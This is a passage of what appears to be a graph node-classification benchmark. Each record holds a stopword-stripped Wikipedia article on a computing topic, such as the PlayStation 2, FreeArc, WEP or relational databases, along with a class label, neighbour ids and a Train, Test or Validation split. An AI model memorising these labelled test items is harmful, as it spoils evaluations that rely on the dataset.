second playstation 2 may natively output video resolutions sdtv hdtv 480i 480p games gran turismo 4 tourist trophy known support up-scaled 1080i resolution using following standards composite video 480i s-video 480i rgb 480i/p vga progressive scan games ps2 linux component video display original playstation games native 240p mode hdtv sets support d-terminal cables available signal types cables also output analog stereo audio additionally rf modulator available system connect older tvs digital s/pdif audio may also output console via toslink connector outputs 2.0 pcm 5.1 channel sound dolby digital dts formats ps2 undergone many revisions internal construction others involving substantial external changes ps2 primarily differentiated models featuring original fat case design slimline models introduced end 2004 2010 sony bravia kdl-22px300 made available consumers 22 hd-ready television incorporated built-in playstation 2 ps2 standard color matte black several variations color produced different quantities regions including ceramic white light yellow metallic blue aqua metallic silver navy star blue opaque blue astral blue opaque black midnight black pearl white sakura purple satin gold satin silver snow white super red transparent blue ocean blue also limited edition color pink distributed regions oceania parts asia september 2004 sony unveiled third major hardware revision available late october 2004 smaller thinner quieter original versions included built-in ethernet port markets also integrated modem due thinner profile contain 3.5 expansion bay therefore support internal hard disk drive also lacked internal power supply later revision excluding japan version similar gamecube modified multitap expansion removal expansion bay criticized limitation due existence titles final fantasy xi required use hdd sony also manufactured consumer device called psx used digital video recorder dvd burner addition playing ps2 games device released japan december 13 2003 first sony product include xrossmediabar interface sell well japanese market released anywhere else class action lawsuit filed sony computer entertainment america inc. july 16 2002 superior court california county san mateo lawsuit addresses consumer reports inappropriate disc error disc read error messages problems associated playing dvds cds playstation 2 sony settled disc read error lawsuit compensating affected customers us 25 free game specified list reduced cost repair replacement scea discretion damaged system settlement subject courts approval hearings began us canada april 28 2006 may 11 2006 respectively playstation 2 software distributed cd-rom dvd-rom two formats differentiated color discs bottoms cd-roms blue dvd-roms silver playstation 2 offered particularly high-profile exclusive games main entries grand theft auto final fantasy metal gear solid series released exclusively console several prolific series got start playstation 2 including god war ratchet clank jak daxter devil may cry kingdom hearts sly cooper best-selling game console game releases peaked 2004 declined release playstation 3 2006 last new games console final fantasy xi seekers adoulin asia fifa 13 north america pro evolution soccer 2014 europe june 30 2007 total 10,035 software titles released worldwide counting games released multiple regions separate titles playstation 2 users option play select games internet using broadband internet connection playstation 2 network adaptor instead unified subscription-based online service like xbox live competitor microsoft later chose xbox console online multiplayer functionality playstation 2 responsibility game publisher ran third-party servers recent playstation 2 online games developed exclusively support broadband internet access xbox live similarly requires broadband internet connection playstation 2 sold 155 million units worldwide march 31 2013 europe sold 48 million units may 6 2008 according sony computer entertainment europe north america sold 50 million units december 2008 japan ps2 sold 21,454,325 units october 1 2008 according famitsu /enterbrain 2005 playstation 2 became fastest game console reach 100 million units shipped accomplishing feat within 5 years 9 months launch since surpassed playstation 4 playstation 2 dualshock 2 controller largely identical playstation dualshock basic functionality however includes analog pressure sensitivity face shoulder d-pad buttons replacing digital buttons original buttons would later become digital release dualshock 4 like predecessor dualshock 2 controller force feedback vibration functionality lighter includes two levels vibration optional hardware includes additional dualshock dualshock 2 controllers ps2 dvd remote control internal external hard disk drive hdd network adapter horizontal vertical stands playstation ps2 memory cards multitap playstation ps2 usb motion camera eyetoy usb keyboard mouse headset original ps2 multitap scph-10090 plugged newer slim models multitap connects memory card slot well controller slot memory card slot slimline shallower new slim-design multitaps scph-70120 manufactured models however third-party adapters also exist permit original multitaps used early versions ps2 could networked via i.link port though little game support dropped third party manufacturers created devices allow disabled people access ps2 ordinary switches etc third-party companies joytech produced lcd monitor speaker attachments ps2 attach back console allow users play games without access television long access mains electricity similar power source screens fold onto ps2 similar fashion laptop screens many accessories musical games dance pads dance dance revolution groove pump titles konami microphones use karaoke revolution games dual microphones sold used exclusively singstar games various guitar controllers guitar freaks series guitar hero series drum set controller sold box set guitar controller usb microphone use rock band guitar hero series world tour newer taiko drum controller specialized controllers include light guns guncon fishing rod reel controllers slime controller final fantasy x-2 tiny bee dual pistol controller katana controller resident evil 4 chainsaw controller unlike playstation requires use official sony playstation mouse play mouse-compatible games ps2 games mouse support work standard usb mouse well usb trackball addition games also support usage usb keyboard text input game control lieu dualshock dualshock 2 gamepad tandem usb mouse using homebrew programs possible play various audio video file formats ps2 homebrew programs also used play patched backups original ps2 dvd games unmodified consoles install retail discs installed hard drive older models homebrew emulators older computer gaming systems developed ps2 sony released linux-based operating system linux playstation 2 ps2 package also includes keyboard mouse ethernet adapter hdd europe australia ps2 comes free yabasic interpreter bundled demo disc allows users create simple programs ps2 port netbsd project blackrhino gnu/linux alternative debian-based distribution also available ps2",
    "neighbors": [
      4098,
      3075,
      3077,
      7173,
      8711,
      10761,
      7183,
      528,
      4112,
      11287,
      4124,
      10780,
      10287,
      2096,
      1587,
      4152,
      1599,
      7234,
      1091,
      6732,
      8782,
      6738,
      607,
      1120,
      1121,
      5215,
      6247,
      5736,
      6250,
      6252,
      6253,
      6256,
      5746,
      11380,
      5237,
      7801,
      10874,
      9851,
      6268,
      6781,
      8316,
      10368,
      643,
      11398,
      8327,
      6799,
      10895,
      5269,
      1693,
      8355,
      6311,
      684,
      9391,
      4786,
      8888,
      6845,
      9917,
      3779,
      3793,
      8917,
      4312,
      6873,
      5340,
      4317,
      5346,
      7912,
      8937,
      3307,
      7916,
      1776,
      3824,
      6390,
      10999,
      760,
      5882,
      3323,
      9477,
      6923,
      783,
      6415,
      3348,
      9501,
      801,
      8481,
      9508,
      9512,
      8492,
      8496,
      6449,
      306,
      6452,
      823,
      1854,
      2368,
      4422,
      3911,
      9543,
      10056,
      7502,
      10576,
      342,
      5974,
      859,
      10076,
      8034,
      7014,
      359,
      7028,
      3451,
      9091,
      9093,
      8071,
      7051,
      921,
      10658,
      4516,
      4518,
      6057,
      426,
      938,
      4524,
      1974,
      4540,
      445,
      1474,
      4043,
      986,
      10203,
      4060,
      1501,
      6109,
      7645,
      11231,
      488,
      4082
    ],
    "mask": "None"
  },
  {
    "node_id": 10317,
    "label": 6,
    "text": "FreeArc:freearc freearc free open-source high-performance file archiver developed bulat ziganshin beta version 0.666 released 2010 freearc next version development version fa 0.11 released october 2016. still current version next version supports 32- 64-bit windows linux includes zstandard support current status information released developers since 2016 website offline longer accessible project considered abandoned users sourceforge confirmed sources reddit software archived longer actively developed august 2019 freearc uses lzma prediction partial matching trueaudio tornado grzip algorithms automatic switching file type additionally uses filters improve compression including rep finds repetitions separations 1gb dict dictionary replacements text delta improves compression tables binary data bcj executables preproccesor lzp removes repetitions text 2010 tom hardware benchmarks comparing popular archivers freearc narrowly outperformed winzip 7-zip winrar best compression mode default compression tests lost 7-zip lzma2 still compressed better winrar winzip tom hardware tests freearc outpaced default settings 7zip lzma2 default compression also winrar even best compression settings freearc compression best settings slower 7zip winrar still came ahead winzip metric devised werner bergmans maximum compression benchmark freearc compression efficient programs classic formats like .z lzw .zip deflate .gz bzip2 scoring formula used non-public test multiplies sum compression decompression times factor exponentially grades ratio archive sizes achieved program test relative best known archive size data set november 2010 freearc top program benchmark followed nanozip bsc winrar works faster winrar 7zip like rar zip archiver data compressor like gzip bzip2 initially supported archive format normally identified codice_1 file name extension incompatible others relationship .arc formats recently decompression support archive types added including zip rar 7z freearc command line interface gui features include windows binaries available developer 64-bit variant version 0.666 october 2016 first public release freearc next released currently available cli application 32 64 bit windows linux platforms new features include",
    "neighbors": [
      3969,
      5380,
      9988,
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      546,
      3876,
      4777,
      3114,
      10027,
      7983,
      2864,
      950,
      823,
      4406,
      6713,
      10817,
      2755,
      11076,
      1352,
      4296,
      3659,
      1101,
      4174,
      8909,
      10575,
      3921,
      722,
      4561,
      8147,
      2389,
      10971,
      3804,
      11614,
      1631,
      3296,
      9953,
      5858,
      10851,
      6759,
      5096,
      7529,
      9320,
      4459,
      8940,
      237,
      1646,
      4845,
      10857,
      7667,
      6389,
      4089,
      2045,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 10318,
    "label": 2,
    "text": "Securelevel:securelevel securelevel security mechanism *bsd kernels optionally restrict certain capabilities securelevel controlled sysctl variable kern.securelevel value integer set value 0 enables certain class restrictions superuser process raise securelevel init process even freebsd lower used freebsd jails jail maintains securelevel addition global securelevel evaluated higher two securelevels used allows host environment run lower securelevel jails manipulate file flags jails may able compiled options regression new sysctl added freebsd kernel allows securelevel lowered purposes automated regression testing securelevel confused runlevel openbsd securelevels defined follows",
    "neighbors": [
      9540,
      2399,
      5492,
      10036,
      700,
      9151
    ],
    "mask": "None"
  },
  {
    "node_id": 10319,
    "label": 0,
    "text": "Intelligent_character_recognition:intelligent character recognition computer science intelligent character recognition icr advanced optical character recognition ocr — rather specific — handwriting recognition system allows fonts different styles handwriting learned computer processing improve accuracy recognition levels icr software self-learning system referred neural network automatically updates recognition database new handwriting patterns extends usefulness scanning devices purpose document processing printed character recognition function ocr hand-written matter recognition process involved recognising hand writing accuracy levels may circumstances good achieve 97 accuracy rates reading handwriting structured forms often achieve high recognition rates several read engines used within software given elective voting rights determine true reading characters numeric fields engines designed read numbers take preference alpha fields engines designed read hand written letters higher elective rights used conjunction bespoke interface hub hand-written data automatically populated back office system avoiding laborious manual keying accurate traditional human data entry important development icr invention automated forms processing 1993 joseph corcoran awarded patent invention involved three-stage process capturing image form processed icr preparing enable icr engine give best results capturing information using icr engine finally processing results automatically validate output icr engine application icr increased usefulness technology made applicable use real world forms normal business applications modern software applications use icr technology recognizing text forms filled hand hand-printed intelligent word recognition iwr recognize extract ria printed-handwritten information cursive handwriting well icr recognizes character-level whereas iwr works full words phrases capable capturing unstructured information every day pages iwr said evolved hand print icr meant replace conventional icr ocr systems iwr optimized processing real-world documents contain mostly free-form hard-to-recognize data fields inherently unsuitable icr means highest best use iwr eliminate high percentage manual entry handwritten data run-on hand print fields documents otherwise could keyed humans",
    "neighbors": [
      8440,
      5857,
      1890,
      1044
    ],
    "mask": "Test"
  },
  {
    "node_id": 10320,
    "label": 0,
    "text": "ALPAC:alpac alpac automatic language processing advisory committee committee seven scientists led john r. pierce established 1964 united states government order evaluate progress computational linguistics general machine translation particular report issued 1966 gained notoriety skeptical research done machine translation far emphasizing need basic research computational linguistics eventually caused u.s. government reduce funding topic dramatically alpac set april 1964 john r. pierce chairman committee consisted testimony heard alpac final recommendations p. 34 therefore research supported",
    "neighbors": [
      1890,
      7780,
      1289,
      3323,
      10557,
      1883,
      7164,
      3389
    ],
    "mask": "None"
  },
  {
    "node_id": 10321,
    "label": 9,
    "text": "JMusic:jmusic jmusic open source music programming library written java programming language written andrew sorensen andrew brown jmusic released publicly november 1998 gnu gpl license designed assist composers music software developers providing support music data structures modifications input/output various file formats display notes sheet music see music notation jmusic data structure based musical score metaphor consists hierarchy notes phrases parts score jmusic also sound synthesis architecture instruments created chain audio objects similar unit generators languages jmusic score rendered jmusic instruments audio file",
    "neighbors": [
      9210,
      5037
    ],
    "mask": "None"
  },
  {
    "node_id": 10322,
    "label": 4,
    "text": "Shavlik_Technologies:shavlik technologies shavlik technologies privately held company founded 1993 mark shavlik one original developers windows nt late 1980s early 1990s microsoft company provided software services network vulnerability assessment managing network security patches mark shavlik left role ceo shavlik technologies acquired vmware may 2011 held position vice president general manager vmware march 2013 april 2013 landesk purchased shavlik business unit rights shavlik products vmware period landesk announced partnership made vmware alliance partner 2017 landesk merged heat software created new software company called ivanti today shavlik name retired shavlik products vital ivanti security portfolio prior acceptance windows nt legitimate enterprise operating system late 1990s enterprise software written unix mainframe operating system shavlik roots providing consulting services help organizations make leap microsoft os contributed delivering products nt shavlik later extended services business software security consulting primarily businesses highly regulated industries banking healthcare services centered providing certified information systems security professional cissp perform security audits penetration testing early 2000s failure keep software up-to-date applying patches common flag audits one central challenges addressing problem companies easy way determine machines date methodology deploy updates era microsoft wrestled addressing issue internally wanted tool detect nt servers large nt server environment missing patches hot fixes see hotfix could installed machines however nt servers critical operations microsoft required process completed without installing extra software agent servers effort address hot fix issue shavlik built first agentless patch scanner windows nt product named hfnetchk acronym designating hotfix network check hfnetchk release followed another partnership wherein shavlik helped build microsoft baseline security analyzer mbsa tool minimal patch scanning along basic os configuration checks delivered microsoft part windows 2000 server toolkit hfnetchk pro 3.0 never released externally introduced ability scan missing patches also deploy patches eliminated need administrator apply patches manually 2003 shavlik brought hfnetchk market first time version 4 featured visual basic web friendly user interface previous versions hfnetchk operated via command line interface january 2003 sql slammer worm exploited vulnerability sql server allowed denial service slowed traffic many internet hosts crawl worm went viral affecting 75,000 systems first ten minutes microsoft made patch available six months prior indicating failure patch led widespread security breach vulnerability shavlik hfnetchk first product market could scan deploy missing patches windows machines aftermath sql slammer worm series highly publicized exploits hit 2003/2004 shavlik made decision move away consulting fully invest software development patch management products shavlik added standalone integrated anti-virus capabilities version 5 hfnetchk changed product name hfnetchk protect eventually dropping hfnetchk version 6 timeframe protect introduced capability patch offline virtual machines vm templates project first series partnerships shavlik entered vmware capability meant protect could agentlessly patch machines physical virtual environments version 7 various point releases new user interface introduced well physical virtual asset inventory agent support integrated protect longer offered separately licensed product shavlik also shifted detection logic protect content version 8 protect fixed many stability issues due number customer complaints shavlik focused making product stable version 9 introduced hypervisor patching vmware implementations well ability patch off-network machines via cloud shavlik technological advancements significant enough attract attention microsoft resulting cooperative efforts two companies development microsoft baseline security analyzer mbsa based shavlik hfnetchk acronym designating hotfix network checker released 2001 technology evolved still core technology current product offerings licensed multiple oem partners provide patch management capabilities variety management solutions combined install base millions users across globe late 2000s industry saw applications exploited hackers shift microsoft os microsoft applications third-party applications like java adobe music players non-microsoft internet browsers time products like microsoft system center configuration manager sccm provided windows patch capabilities via windows server update services wsus however n't still n't patch third-party products according global analyst firm gartner left administrators limited choices n't patch third-party products leaving network risk author test custom patch time third-party product requires update deploy patches manually affected machine april 2010 shavlik released scupdates – catalog patch content automated process building third-party patches delivering windows clients via integration microsoft system center updates publisher scup sccm tandem initial scupdates release microsoft shavlik also announced shavlik inclusion microsoft system center alliance 2010 shavlik released it.shavlik provided web-based front-end traditional shavlik toolkit asset inventory patch scanning patch deployment software service saas application simplified workflow inventory systems patching possible on-premises protect solution early 2009 shavlik formed oem partnership vmware build cloud-based application designed help administrators smaller businesses deploy virtual environment vmware go vgo intended onramp virtualization serving smaller customers ready upgrade sophisticated vcenter suite vgo originally brought market free-use cloud-based product vmware shavlik invested heavily vgo product expanded include asset inventory patch scanning advisor recommendation engine later attempts monetize vgo services paid version called vmware go pro introduced patch deployment led migration users it.shavlik vmware go vmware interest vgo well virtual infrastructure patching capabilities within protect led acquisition shavlik technologies may 2011 terms acquisition publicly disclosed january 2013 vmware announced intent sharpen focus software-defined data center hybrid cloud services part realignment vmware sought sell products n't contributing core business sliderocket presentation software non-key cloud virtualization technologies shavlik product line found list april 2013 landesk software purchased shavlik business unit rights shavlik products vmware time landesk announced partnership added vmware landesk list alliance partners shavlik move landesk triggered new investment shavlik patch microsoft system center formerly scupdates well products enhance experience companies using sccm early 2017 clearlake capital group acquired landesk shavlik along heat software appsense wavelink combined company uses new corporate name product brand ivanti",
    "neighbors": [
      10307,
      5673,
      6153,
      8976,
      5492,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10323,
    "label": 4,
    "text": "Chargeware:chargeware chargeware seemingly valid looking mobile applications used charge user services without proper notification knowledge often focused internet pornography third-party porn apps downloaded onto user mobile device turn infecting phone malware known chargeware purpose chargeware manipulate user agreeing unclear terms fees charges applied without user full understanding consent chargeware deliberately difficult renege charges continue long possible without carrier interference 2013 hundreds thousands users primarily france uk experienced applications nature ultimately lead forms malware mobile device various countries spain encountered chargeware infections almost matched number adware infections japan lowest number chargeware infections country hackers reportedly learning market changing tactics i.e. mobile malware operations harder trace harder shut said markets also include specific countries since charging practices vary either country carrier basis",
    "neighbors": [
      10392,
      877,
      10141
    ],
    "mask": "None"
  },
  {
    "node_id": 10324,
    "label": 9,
    "text": "Essentials_of_Programming_Languages:essentials programming languages essentials programming languages eopl textbook programming languages daniel p. friedman mitchell wand christopher t. haynes eopl surveys principles programming languages operational perspective starts interpreter scheme simple functional core language similar lambda calculus systematically adds constructs addition example variable assignment thread-like control book illustrates increase expressive power programming language demand new constructs formulation direct interpreter book also demonstrates systematic transformations say store-passing style continuation-passing style eliminate certain constructs language interpreter formulated second part book dedicated systematic translation interpreter register machines transformations show eliminate higher-order closures continuation objects recursive function calls end reader left interpreter uses nothing tail-recursive function calls assignment statements plus conditionals becomes trivial translate code c program even assembly program bonus book shows pre-compute certain pieces meaning generate representation pre-computations since essence compilation book also prepares reader course principles compilation language translation related distinct topic apart text explaining key concepts book also comprises series exercises enabling readers explore alternative designs issues like sicp eopl represents significant departure prevailing textbook approach 1980s time book principles programming languages presented four six even programming languages discussed programming idioms implementation high level successful books typically covered algol 60 so-called algol family programming languages snobol lisp prolog even today fair number textbooks programming languages surveys though scope narrowed eopl started 1983 indiana one leading departments programming languages research eugene kohlbecker one friedman phd students transcribed collected 311 lectures faculty members including mitch wand christopher haynes started contributing turned hitchhiker guide meta-universe —as kohlbecker called it—into systematic interpreter transformation-based survey 25 years existence book become near-classic third edition including additional topics types modules first part incorporates ideas programming htdp another unconventional textbook uses scheme teach principles program design authors well matthew flatt recently provided drracket plug-ins language levels teaching eopl eopl spawned least two related texts queinnec lisp small pieces krishnamurthi",
    "neighbors": [
      10083,
      8421,
      6502,
      4839,
      8262,
      10569,
      1610,
      4846,
      6767,
      2964,
      9304,
      10395,
      6047
    ],
    "mask": "Test"
  },
  {
    "node_id": 10325,
    "label": 3,
    "text": "Network_Computer_Reference_Profile:network computer reference profile network computer reference profile nc reference profile ncrp specification network computer put forward oracle corporation endorsed sun microsystems ibm apple computer netscape finalized 1996 first version specification known nc1 reference profile ncrp specified minimum hardware requirements software protocols among software requirements support ip-based protocols tcp/ip ftp etc www standards http html java email protocols multimedia file formats security standards operating systems used ncos javaos minimum hardware requirements although initial nc standard intended promote diskless workstation model computing preclude computers additional features ability operate either diskless workstation conventional fat client thus ordinary personal computer pc required features could technically classified network computer indeed sun noted contemporary pcs indeed meet nc reference requirements reference profile subsequently revised use strongarm processor trip ellison acer group headquarters 1996 realised importance industry products based intel x86-compatible processors nci president jerry baker noted nobody corporate users ever heard arm chip many ncs operated via protocols bootp dhcp rarp nfs isp-bound lan-based reference implementation ncs smartcard option available allowed user authentication performed secure manner ssl providing transport security smartcard also provided minimal local storage isp dialup configuration settings configuration data required lan-based ncs network computer brand created oracle ncrp specification",
    "neighbors": [
      3297,
      9665,
      7364,
      4679,
      10926,
      7983,
      9745,
      10481,
      499,
      2996,
      10548,
      5433,
      3323,
      2558,
      5375
    ],
    "mask": "None"
  },
  {
    "node_id": 10326,
    "label": 1,
    "text": "Relation_(database):relation database relational database theory relation originally defined e. f. codd set tuples ... element member data domain codd original definition notwithstanding contrary usual definition mathematics ordering elements tuples relation instead element termed attribute value attribute name paired domain nowadays commonly referred type data type attribute value attribute name paired element attribute domain tuple set attribute values two distinct elements name thus accounts tuple described function mapping names values set attributes two distinct elements name called heading set tuples heading called body relation thus heading paired body heading relation also heading tuple body number attributes constituting heading called degree term also applies tuples relations term n -tuple refers tuple degree n n ≥ 0 e. f. codd used term relation mathematical sense finitary relation set tuples set n sets ... thus n -ary relation interpreted closed world assumption extension n -adic predicate n -tuples whose values substituted corresponding free variables predicate yield propositions hold true appear relation term relation schema refers heading paired set constraints defined terms heading relation thus seen instantiation relation schema heading schema satisfies applicable constraints sometimes relation schema taken include name relational database definition database schema sometimes referred relational schema thus thought collection named relation schemas implementations domain attribute effectively data type named relation schema effectively relation variable relvar short sql database language relational databases relations represented tables row table represents single tuple values attribute form column example relation three named attributes 'id domain integers 'name 'address domain strings predicate relation using attribute names denote free variables might employee number id known name lives address examination relation tells us four tuples predicate holds true example employee 102 known name yonezawa akinori live anywhere else naha okinawa also apart four employees shown employee name address definition body tuples body appear particular order one say tuple 'murata makoto tuple 'matsumoto yukihiro one say tuple 'yonezawa akinori first tuple similar comment applies rows sql table definition heading attributes element appear particular order either therefore elements tuple similar comment apply sql define ordering columns table relational database consists named relation variables relvars purposes updating database response changes real world update single relvar causes body relation assigned variable replaced different set tuples relvars classified two classes base relation variables derived relation variables latter also known virtual relvars usually referred short term view base relation variable relation variable derived relation variables sql term base table equates approximately base relation variable view defined expression using operators relational algebra relational calculus expression operates one relations evaluated yields another relation result sometimes referred derived relation operands relations assigned database variables view defined giving name expression name subsequently used variable name note expression must mention least one base relation variable using data definition language ddl able define base relation variables sql codice_1 syntax used define base tables following example data definition language ddl also used define derived relation variables sql codice_2 syntax used define derived relation variable following example",
    "neighbors": [
      10628,
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      5403,
      9112,
      10137,
      4255,
      9248,
      9631,
      9634,
      10145,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      10294,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      8130,
      2246,
      9286,
      2632,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      4065,
      9828,
      10340,
      10471,
      2024,
      8808,
      2026,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      244,
      7412,
      1146,
      3196
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10327,
    "label": 3,
    "text": "Ultra_1:ultra 1 ultra 1 family sun microsystems workstations based 64-bit ultrasparc microprocessor first model sun ultra series sun computers succeeded sparcstation series launched 1995 shipped solaris 2.5 capable running operating systems linux bsd ultra 1 available variety different specifications three different cpu speeds available 143 mhz model 140 167 mhz model 170 200 mhz model 200 ultra 1 creator3d 170e launched november 1995 list price us 27,995 model numbers e suffix sun service code a12 internal codename electron two instead three sbus slots added upa slot allow use optional creator framebuffer addition e models wide scsi fast ethernet interfaces place narrow scsi 10base-t ethernet standard ultra 1 service code a11 codename neutron ultra 1 uses 200-pin 5v ecc 60ns simm pairs similar sun machines netra 1 servers chassis ultraserver 1/ultra enterprise 1 servers",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      1809,
      2710,
      1316,
      10789,
      1707,
      3247,
      6322,
      823,
      7104,
      9665,
      6338,
      10436,
      8007,
      1480,
      2895,
      597,
      10200,
      4960,
      9955,
      11363,
      11626,
      7148,
      7022,
      8179,
      11636,
      9333,
      1399,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 10328,
    "label": 3,
    "text": "Blasteroids:blasteroids blasteroids third official sequel 1979 shoot 'em video game asteroids developed atari games released coin-operated game 1987 unlike previous games blasteroids uses raster graphics vector graphics home computer ports blasteroids released image works amiga amstrad cpc atari st commodore 64 msx ms-dos zx spectrum additionally though appeared midway arcade compilation prior emulated version blasteroids included lego dimensions unlockable mini-game gameplay game basically original player players case 2-player game controls spaceship viewed 2d representation space rotating ship using thrust give ship momentum slow completely stop moving player rotate ship face direction came generate right amount thrust nullify momentum ship limited amount fuel generate thrust fuel comes form energy also used ship shields protect collisions enemy fire energy gone player ship destroyed ship shoot destroy asteroids enemy ships ship also transformed 3 different versions namely speeder fastest version fighter firepower warrior extra armour start game player screen four warps indicating game difficulty easy medium hard expert flying warps starts game difficulty several galaxies 9 16 sectors depending difficulty sector completed destroying asteroids exit portal appears lead player galactic map screen similarly difficulty screen player choose sector visit next completed empty sectors revisited costs energy sectors currently range marked sector consists visible screen wraparound object game destroy asteroids set speed fly sector asteroids come varying sizes shot larger asteroids break multiple smaller ones shooting smallest ones actually remove sector asteroids also come different types normal asteroids n't contain anything red asteroids contain power-ups form power crystals released completely destroying asteroids crystals decay time popcorn asteroids require several hits expands size eventually makes stop spinning ca n't destroyed stopping enough finish sector egg asteroids contain leeches home user ship suck energy shot destroyed finally seeker asteroids home player ship shot besides asteroids different enemy ships trying shoot player leave equipment form power-ups destroyed different kinds equipment mukor alien boss sectors cleared asteroids try ram player send miniature enemy ships aid mukor tentacles must shot multiple times destroyed tentacles gone mukor defeated leave special equipment reappear next galaxy larger number tentacles making harder defeat mukor must defeated galaxies fully conquered player win game second player join game time pressing fire button using 1 credit turning blasteroids multiplayer game players cooperate covering well docking ships starlet docking possible one ship speeder warrior flying turn speeder stationary turret firepower top warrior turns spiaret less firepower full control ships undock either player transforms ship something else first player exit exit portal gets large bonus control galactic map",
    "neighbors": [
      2530,
      10931,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 10329,
    "label": 4,
    "text": "Wired_Equivalent_Privacy:wired equivalent privacy wired equivalent privacy wep security algorithm ieee 802.11 wireless networks introduced part original 802.11 standard ratified 1997 intention provide data confidentiality comparable traditional wired network wep recognizable key 10 26 hexadecimal digits 40 104 bits one time widely use often first security choice presented users router configuration tools 2003 wi-fi alliance announced wep superseded wi-fi protected access wpa 2004 ratification full 802.11i standard i.e wpa2 ieee declared wep-40 wep-104 deprecated wep encryption protocol available 802.11a 802.11b devices built wpa standard available 802.11g devices however 802.11b devices later provided firmware software updates enable wpa newer devices built wep ratified wi-fi security standard 1999 first versions wep particularly strong even time released u.s. restrictions export various cryptographic technology led manufacturers restricting devices 64-bit encryption restrictions lifted increased 128-bit despite introduction 256-bit wep 128-bit remains one common implementations wep included privacy component original ieee 802.11 standard ratified 1997 wep uses stream cipher rc4 confidentiality crc-32 checksum integrity deprecated 2004 documented current standard standard 64-bit wep uses 40 bit key also known wep-40 concatenated 24-bit initialization vector iv form rc4 key time original wep standard drafted u.s. government export restrictions cryptographic technology limited key size restrictions lifted manufacturers access points implemented extended 128-bit wep protocol using 104-bit key size wep-104 64-bit wep key usually entered string 10 hexadecimal base 16 characters 0–9 a–f character represents 4 bits 10 digits 4 bits gives 40 bits adding 24-bit iv produces complete 64-bit wep key 4 bits × 10 24 bits iv 64 bits wep key devices also allow user enter key 5 ascii characters 0–9 a–z a–z turned 8 bits using character byte value ascii 8 bits × 5 24 bits iv 64 bits wep key however restricts byte printable ascii character small fraction possible byte values greatly reducing space possible keys 128-bit wep key usually entered string 26 hexadecimal characters 26 digits 4 bits gives 104 bits adding 24-bit iv produces complete 128-bit wep key 4 bits × 26 24 bits iv 128 bits wep key devices also allow user enter 13 ascii characters 8 bits × 13 24 bits iv 128 bits wep key 152-bit 256-bit wep systems available vendors wep variants 24 bits iv leaving 128 232 bits actual protection 128 232 bits typically entered 32 58 hexadecimal characters 4 bits × 32 24 bits iv 152 bits wep key 4 bits × 58 24 bits iv 256 bits wep key devices also allow user enter 16 29 ascii characters 8 bits × 16 24 bits iv 152 bits wep key 8 bits × 29 24 bits iv 256 bits wep key two methods authentication used wep open system authentication shared key authentication open system authentication wlan client provide credentials access point authentication client authenticate access point attempt associate effect authentication occurs subsequently wep keys used encrypting data frames point client must correct keys shared key authentication wep key used authentication four-step challenge-response handshake authentication association pre-shared wep key also used encrypting data frames using rc4 first glance might seem though shared key authentication secure open system authentication since latter offers real authentication however quite reverse possible derive keystream used handshake capturing challenge frames shared key authentication therefore data easily intercepted decrypted shared key authentication open system authentication privacy primary concern advisable use open system authentication wep authentication rather shared key authentication however also means wlan client connect ap authentication mechanisms weak shared key wep deprecated favor wpa/wpa2 rc4 stream cipher traffic key must never used twice purpose iv transmitted plain text prevent repetition 24-bit iv long enough ensure busy network way iv used also opened wep related key attack 24-bit iv 50 probability iv repeat 5000 packets august 2001 scott fluhrer itsik mantin adi shamir published cryptanalysis wep exploits way rc4 ciphers iv used wep resulting passive attack recover rc4 key eavesdropping network depending amount network traffic thus number packets available inspection successful key recovery could take little one minute insufficient number packets sent ways attacker send packets network thereby stimulate reply packets inspected find key attack soon implemented automated tools since released possible perform attack personal computer off-the-shelf hardware freely available software aircrack-ng crack wep key minutes cam-winget et al surveyed variety shortcomings wep write experiments field show proper equipment practical eavesdrop wep-protected networks distances mile target also reported two generic weaknesses 2005 group u.s. federal bureau investigation gave demonstration cracked wep-protected network 3 minutes using publicly available tools andreas klein presented another analysis rc4 stream cipher klein showed correlations rc4 keystream key ones found fluhrer mantin shamir additionally used break wep wep-like usage modes 2006 bittau handley lackey showed 802.11 protocol used wep enable earlier attacks previously thought impractical eavesdropping single packet attacker rapidly bootstrap able transmit arbitrary data eavesdropped packet decrypted one byte time transmitting 128 packets per byte decrypt discover local network ip addresses finally 802.11 network connected internet attacker use 802.11 fragmentation replay eavesdropped packets crafting new ip header onto access point used decrypt packets relay buddy internet allowing real-time decryption wep traffic within minute eavesdropping first packet 2007 erik tews andrei pychkine ralf-philipp weinmann able extend klein 2005 attack optimize usage wep new attack possible recover 104-bit wep key probability 50 using 40,000 captured packets 60,000 available data packets success probability 80 85,000 data packets 95 using active techniques like deauth arp re-injection 40,000 packets captured less one minute good conditions actual computation takes 3 seconds 3 mb main memory pentium-m 1.7 ghz additionally optimized devices slower cpus attack used 40-bit keys even higher success probability 2008 payment card industry pci security standards council latest update data security standard dss prohibits use wep part credit-card processing 30 june 2010 prohibits new system installed uses wep 31 march 2009 use wep contributed tj maxx parent company network invasion use encrypted tunneling protocols e.g ipsec secure shell provide secure data transmission insecure network however replacements wep developed goal restoring security wireless network recommended solution wep security problems switch wpa2 wpa intermediate solution hardware could support wpa2 wpa wpa2 much secure wep add support wpa wpa2 old wi-fi access points might need replaced firmware upgraded wpa designed interim software-implementable solution wep could forestall immediate deployment new hardware however tkip basis wpa reached end designed lifetime partially broken officially deprecated release 802.11-2012 standard stopgap enhancement wep present early 802.11i drafts implementable hardware able handle wpa wpa2 extended iv key values 128 bits hoped eliminate duplicate iv deficiency well stop brute force key attacks became clear overall wep algorithm deficient iv key sizes would require even fixes wep2 name original algorithm dropped two extended key lengths remained eventually became wpa tkip wepplus also known wep+ proprietary enhancement wep agere systems formerly subsidiary lucent technologies enhances wep security avoiding weak ivs completely effective wepplus used ends wireless connection easily enforced remains serious limitation also necessarily prevent replay attacks ineffective later statistical attacks rely weak ivs dynamic wep refers combination 802.1x technology extensible authentication protocol dynamic wep changes wep keys 